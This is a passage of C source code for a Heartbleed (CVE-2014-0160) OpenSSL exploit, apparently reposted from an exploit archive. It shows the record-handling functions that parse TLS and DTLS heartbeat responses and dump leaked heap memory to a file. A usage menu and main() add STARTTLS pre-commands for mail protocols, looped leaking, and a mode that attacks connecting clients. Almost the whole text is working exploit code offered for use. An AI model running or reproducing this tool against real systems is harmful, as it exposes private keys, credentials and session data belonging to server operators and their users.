        if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {
                al=SSL_AD_RECORD_OVERFLOW;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
                goto apple;
        }
        rr->off=0;
        s->packet_length=0;
    if(first==0){
        uint heartbleed_len = 0;
        char* fp = s->s3->rrec.data;
        (long)fp++;
        memcpy(&heartbleed_len,fp,2);
        heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
        first = 2;
        leakbytes = heartbleed_len + 16;
        printf("[ heartbleed leaked length=%u\n",heartbleed_len);
    }
    if(verbose==1){
        { unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
                printf("\n");
        }
    leakbytes-=rr->length;
    if(leakbytes > 0){
        repeat = 1;
    }
    else{
        repeat = 0;
    }
    printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
    int output = s->s3->rrec.length-3;
    if(output > 0){
        int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
            if(first==2){
            first--;
            write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
            /* first three bytes are resp+len */
            printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
        }
        else{
            /* heap data & 16 bytes padding */
            write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
            printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
        }
        close(fd);
    }
    else{
        printf("[ nothing from the heap to write\n");
    }
    return;
apple:
        printf("[ problem handling SSL record packet - wrong type?\n");
    badpackets++;
    if(badpackets > 3){
        printf("[ error: too many bad packets recieved\n");
        exit(0);
    }
    return;
}
 
 
void* dtlssneakyleaky(connection *c,char* filename, int verbose){
    char *p;
        int ssl_major,ssl_minor,al;
        int enc_err,n,i;
        SSL3_RECORD *rr;
        SSL_SESSION *sess;
    SSL* s;
    DTLS1_BITMAP *bitmap;
    unsigned int is_next_epoch;
        unsigned char md[EVP_MAX_MD_SIZE];
        short version;
        unsigned int mac_size, orig_len;
 
        rr= &(c->sslHandle->s3->rrec);
        sess=c->sslHandle->session;
        s = c->sslHandle;
 
again:
        if ((s->rstate != SSL_ST_READ_BODY) ||
                (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {
                        n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
                        if (n <= 0)
                                goto apple;
 
                        s->rstate=SSL_ST_READ_BODY;
                        p=s->packet;
                        rr->type= *(p++);
                        ssl_major= *(p++);
                        ssl_minor= *(p++);
                        version=(ssl_major<<8)|ssl_minor;
            n2s(p,rr->epoch);
            memcpy(&(s->s3->read_sequence[2]), p, 6);
            p+=6;
                        n2s(p,rr->length);
            if(rr->type==24){
                printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
                if(rr->length > 16834){
                    printf("[ error: got a malformed TLS length.\n");
                    exit(0);
                }
            }
            else{
                printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
                s->packet_length=0;
                badpackets++;
                if(badpackets > 3){
                    printf("[ error: too many bad packets recieved\n");
                    exit(0);
                }
                goto apple;
            }
        }
 
        if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){
                i=rr->length;
                n=ssl3_read_n(s,i,i,1);
                if (n <= 0) goto apple;
        }
        if ( n != i)
            {
            rr->length = 0;
            s->packet_length = 0;
            goto again;
            }
    printf("[ decrypting SSL packet\n");
        s->rstate=SSL_ST_READ_HEADER;
 
    bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);
    if ( bitmap == NULL)
        {
        rr->length = 0;
        s->packet_length = 0;
        goto again;
        }
 
        if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&
            *p == SSL3_MT_CLIENT_HELLO) &&
            !dtls1_record_replay_check(s, bitmap))
            {
            rr->length = 0;
            s->packet_length=0;
            goto again;
            }
 
    if (rr->length == 0) goto again;
if (is_next_epoch)
        {
        if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)
            {
            dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);
            }
        rr->length = 0;
        s->packet_length = 0;
        goto again;
        }
 
 
        rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);
        rr->data=rr->input;
    orig_len=rr->length;
 
        dtls1_enc(s,0);
 
        if((sess != NULL) &&
            (s->enc_read_ctx != NULL) &&
            (EVP_MD_CTX_md(s->read_hash) != NULL))
                {
                unsigned char *mac = NULL;
                unsigned char mac_tmp[EVP_MAX_MD_SIZE];
                mac_size=EVP_MD_CTX_size(s->read_hash);
                OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
                orig_len = rr->length+((unsigned int)rr->type>>8);
                if(orig_len < mac_size ||
                  (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
                   orig_len < mac_size+1)){
                        al=SSL_AD_DECODE_ERROR;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
                }
                if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
                        mac = mac_tmp;
                        ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
                        rr->length -= mac_size;
                }
                else{
                        rr->length -= mac_size;
                        mac = &rr->data[rr->length];
                }
                i = tls1_mac(s,md,0);
 
                if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
                        enc_err = -1;
 
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)
                        enc_err = -1;
                }
        if(enc_err < 0){
                al=SSL_AD_BAD_RECORD_MAC;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
                goto apple;
        }
        if(s->expand != NULL){
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {
                        al=SSL_AD_RECORD_OVERFLOW;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
                        goto apple;
                        }
                if (!ssl3_do_uncompress(s)) {
                        al=SSL_AD_DECOMPRESSION_FAILURE;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
                        goto apple;
                        }
                }
 
        if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {
                al=SSL_AD_RECORD_OVERFLOW;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
                goto apple;
        }
        rr->off=0;
        s->packet_length=0;
    dtls1_record_bitmap_update(s, &(s->d1->bitmap));
    if(first==0){
        uint heartbleed_len = 0;
        char* fp = s->s3->rrec.data;
        (long)fp++;
        memcpy(&heartbleed_len,fp,2);
        heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
        first = 2;
        leakbytes = heartbleed_len + 16;
        printf("[ heartbleed leaked length=%u\n",heartbleed_len);
    }
    if(verbose==1){
        { unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
                printf("\n");
        }
    leakbytes-=rr->length;
    if(leakbytes > 0){
        repeat = 1;
    }
    else{
        repeat = 0;
    }
    printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
    int output = s->s3->rrec.length-3;
    if(output > 0){
        int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
            if(first==2){
            first--;
            write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
            /* first three bytes are resp+len */
            printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
        }
        else{
            /* heap data & 16 bytes padding */
            write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
            printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
        }
        close(fd);
    }
    else{
        printf("[ nothing from the heap to write\n");
    }
 
            dtls1_stop_timer(c->sslHandle);
            c->sslHandle->tlsext_hb_seq++;
            c->sslHandle->tlsext_hb_pending = 0;
 
    return;
apple:
        printf("[ problem handling SSL record packet - wrong type?\n");
    badpackets++;
    if(badpackets > 3){
        printf("[ error: too many bad packets recieved\n");
        exit(0);
    }
    return;
}
 
static DTLS1_BITMAP *
dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)
    {
     
    *is_next_epoch = 0;
 
    if (rr->epoch == s->d1->r_epoch)
        return &s->d1->bitmap;
 
    else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&
        (rr->type == SSL3_RT_HANDSHAKE ||
            rr->type == SSL3_RT_ALERT))
        {
        *is_next_epoch = 1;
        return &s->d1->next_bitmap;
        }
 
    return NULL;
    }
 
static int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)
    {
    int cmp;
    unsigned int shift;
    const unsigned char *seq = s->s3->read_sequence;
 
    cmp = satsub64be(seq,bitmap->max_seq_num);
    if (cmp > 0)
        {
        memcpy (s->s3->rrec.seq_num,seq,8);
        return 1;
        }
    shift = -cmp;
    if (shift >= sizeof(bitmap->map)*8)
        return 0;
    else if (bitmap->map & (1UL<<shift))
        return 0;
 
    memcpy (s->s3->rrec.seq_num,seq,8);
    return 1;
    }
 
int satsub64be(const unsigned char *v1,const unsigned char *v2)
{   int ret,sat,brw,i;
 
    if (sizeof(long) == 8) do
    {   const union { long one; char little; } is_endian = {1};
        long l;
 
        if (is_endian.little)           break;
 
        if (((size_t)v1|(size_t)v2)&0x7)    break;
 
        l  = *((long *)v1);
        l -= *((long *)v2);
        if (l>128)       return 128;
        else if (l<-128) return -128;
        else            return (int)l;
    } while (0);
 
    ret = (int)v1[7]-(int)v2[7];
    sat = 0;
    brw = ret>>8;
    if (ret & 0x80)
    {   for (i=6;i>=0;i--)
        {   brw += (int)v1[i]-(int)v2[i];
            sat |= ~brw;
            brw >>= 8;
        }
    }
    else
    {   for (i=6;i>=0;i--)
        {   brw += (int)v1[i]-(int)v2[i];
            sat |= brw;
            brw >>= 8;
        }
    }
    brw <<= 8;
 
    if (sat&0xff)   return brw | 0x80;
    else        return brw + (ret&0xFF);
}
 
static int
dtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)
    {
    DTLS1_RECORD_DATA *rdata;
    pitem *item;
 
    if (pqueue_size(queue->q) >= 100)
        return 0;
         
    rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));
    item = pitem_new(priority, rdata);
    if (rdata == NULL || item == NULL)
        {
        if (rdata != NULL) OPENSSL_free(rdata);
        if (item != NULL) pitem_free(item);
         
        SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
        return(0);
        }
     
    rdata->packet = s->packet;
    rdata->packet_length = s->packet_length;
    memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));
    memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));
 
    item->data = rdata;
 
#ifndef OPENSSL_NO_SCTP
    if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
        (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {
        BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);
    }
#endif
 
    if (pqueue_insert(queue->q, item) == NULL)
        {
        OPENSSL_free(rdata);
        pitem_free(item);
        return(0);
        }
 
    s->packet = NULL;
    s->packet_length = 0;
    memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));
    memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));
     
    if (!ssl3_setup_buffers(s))
        {
        SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
        OPENSSL_free(rdata);
        pitem_free(item);
        return(0);
        }
     
    return(1);
    }
 
 
static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)
    {
    int cmp;
    unsigned int shift;
    const unsigned char *seq = s->s3->read_sequence;
 
    cmp = satsub64be(seq,bitmap->max_seq_num);
    if (cmp > 0)
        {
        shift = cmp;
        if (shift < sizeof(bitmap->map)*8)
            bitmap->map <<= shift, bitmap->map |= 1UL;
        else
            bitmap->map = 1UL;
        memcpy(bitmap->max_seq_num,seq,8);
        }
    else    {
        shift = -cmp;
        if (shift < sizeof(bitmap->map)*8)
            bitmap->map |= 1UL<<shift;
        }
    }
 
 
void usage(){
    printf("[\n");
    printf("[ --server|-s <ip/dns>    - the server to target\n");
    printf("[ --port|-p   <port>      - the port to target\n");
    printf("[ --file|-f   <filename>  - file to write data to\n");
    printf("[ --bind|-b   <ip>        - bind to ip for exploiting clients\n");
    printf("[ --precmd|-c <n>         - send precmd buffer (STARTTLS)\n");
    printf("[               0 = SMTP\n");
    printf("[               1 = POP3\n");
    printf("[               2 = IMAP\n");
    printf("[ --loop|-l       - loop the exploit attempts\n");
    printf("[ --type|-t   <n>         - select exploit to try\n");
    printf("[                           0 = null length\n");
    printf("[               1 = max leak\n");
    printf("[               n = heartbeat payload_length\n");
    printf("[ --udp|-u               - use dtls/udp\n");
    printf("[\n");
    printf("[ --verbose|-v            - output leak to screen\n");
    printf("[ --help|-h               - this output\n");
    printf("[\n");
    exit(0);
}
 
int main(int argc, char* argv[]){
    int ret, port, userc, index;
    int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
    int loop = 0;
    struct hostent *h;
    connection* c;
    char *host, *file;
    int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
    printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
    printf("[ =============================================================\n");
        static struct option options[] = {
            {"server", 1, 0, 's'},
            {"port", 1, 0, 'p'},
        {"file", 1, 0, 'f'},
        {"type", 1, 0, 't'},
        {"bind", 1, 0, 'b'},
        {"verbose", 0, 0, 'v'},
        {"precmd", 1, 0, 'c'},
        {"loop", 0, 0, 'l'},
        {"help", 0, 0,'h'},
        {"udp", 0, 0, 'u'}
        };
    while(userc != -1) {
            userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);  
            switch(userc) {
                    case -1:
                            break;
                    case 's':
                if(ihost==0){
                    ihost = 1;
                    h = gethostbyname(optarg);             
                    if(h==NULL){
                        printf("[!] FATAL: unknown host '%s'\n",optarg);
                        exit(1);
                    }
                    host = malloc(strlen(optarg) + 1);
                    if(host==NULL){
                                printf("[ error in malloc()\n");
                                exit(0);
                        }
                    sprintf(host,"%s",optarg);
                        }
                break;
                    case 'p':
                if(iport==0){
                    port = atoi(optarg);
                    iport = 1;
                }
                            break;
            case 'f':
                if(ifile==0){
                    file = malloc(strlen(optarg) + 1);
                    if(file==NULL){
                                printf("[ error in malloc()\n");
                                exit(0);
                        }
                    sprintf(file,"%s",optarg);
                    ifile = 1;
                }
                break;
            case 't':
                if(itype==0){
                    type = atoi(optarg);
                    itype = 1;
                }
                break;
            case 'h':
                usage();
                break;
            case 'b':
                if(ihost==0){
                    ihost = 1;
                    host = malloc(strlen(optarg)+1);
                    if(host==NULL){
                                printf("[ error in malloc()\n");
                                exit(0);
                        }
                    sprintf(host,"%s",optarg);
                    bind = 1;
                }
                break;
            case 'c':
                if(iprecmd == 0){
                    iprecmd = 1;
                    precmd = atoi(optarg);
                }
                break;
            case 'v':
                verbose = 1;
                break;
            case 'l':
                loop = 1;
                break;
                    case 'u':
                udp = 1;
                break;
 
            default:
                break;
        }
    }
    if(ihost==0||iport==0||ifile==0||itype==0){
        printf("[ try --help\n");
        exit(0);
    }
    ssl_init();
    if(bind==0){
        if (udp){
            c = dtls_client(ret, host, port);
            dtlsheartbleed(c, type);
            dtlssneakyleaky(c,file,verbose);
            while(repeat==1){
                dtlssneakyleaky(c,file,verbose);
            }
            while(loop==1){
                printf("[ entered heartbleed loop\n");
                first=0;
                repeat=1;
                dtlsheartbleed(c,type);
                while(repeat==1){
                    dtlssneakyleaky(c,file,verbose);
                }
            }
        }
        else {
            ret = tcp_connect(host, port);
            pre_cmd(ret, precmd, verbose);
            c = tls_connect(ret);
            heartbleed(c,type);
            while(repeat==1){
                sneakyleaky(c,file,verbose);
            }
            while(loop==1){
                printf("[ entered heartbleed loop\n");
                first=0;
                repeat=1;
                heartbleed(c,type);
                while(repeat==1){
                    sneakyleaky(c,file,verbose);
                }
            }
        }
 
        SSL_shutdown(c->sslHandle);
        close (ret);
        SSL_free(c->sslHandle);
    }
    else{
        int sd, pid, i;
        if (udp) {
            c = dtls_server(sd, host, port);
            while (1) {
                char * bytes = malloc(1024);
                struct sockaddr_in peer;
                socklen_t len = sizeof(peer);
                    if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {
                    dtlsheartbleed(c,type);
                    dtlssneakyleaky(c,file,verbose);
                        while(loop==1){
                            printf("[ entered heartbleed loop\n");
                            first=0;
                            repeat=0;
                            dtlsheartbleed(c,type);
                            while(repeat==1){
                                dtlssneakyleaky(c,file,verbose);
                            }
                        }
                    }
            }
        }
        else {
            ret = tcp_bind(host, port);
            while(1){
                    sd=accept(ret,0,0);
                if(sd==-1){
                    printf("[!] FATAL: problem with accept()\n");
                    exit(0);
                }
                if(pid=fork()){
                    close(sd);
                }
                    else{
                    c = tls_bind(sd);
                    pre_cmd(ret, precmd, verbose);
                    heartbleed(c,type);
                    while(repeat==1){
                        sneakyleaky(c,file,verbose);
                    }
                    while(loop==1){
                        printf("[ entered heartbleed loop\n");
                        first=0;
                        repeat=0;
                        heartbleed(c,type);
                        while(repeat==1){
                            sneakyleaky(c,file,verbose);
                        }
                    }
                    printf("[ done.\n");
                    exit(0);
                }
            }
        }
    }
}

#  0day.today [2024-11-16]  #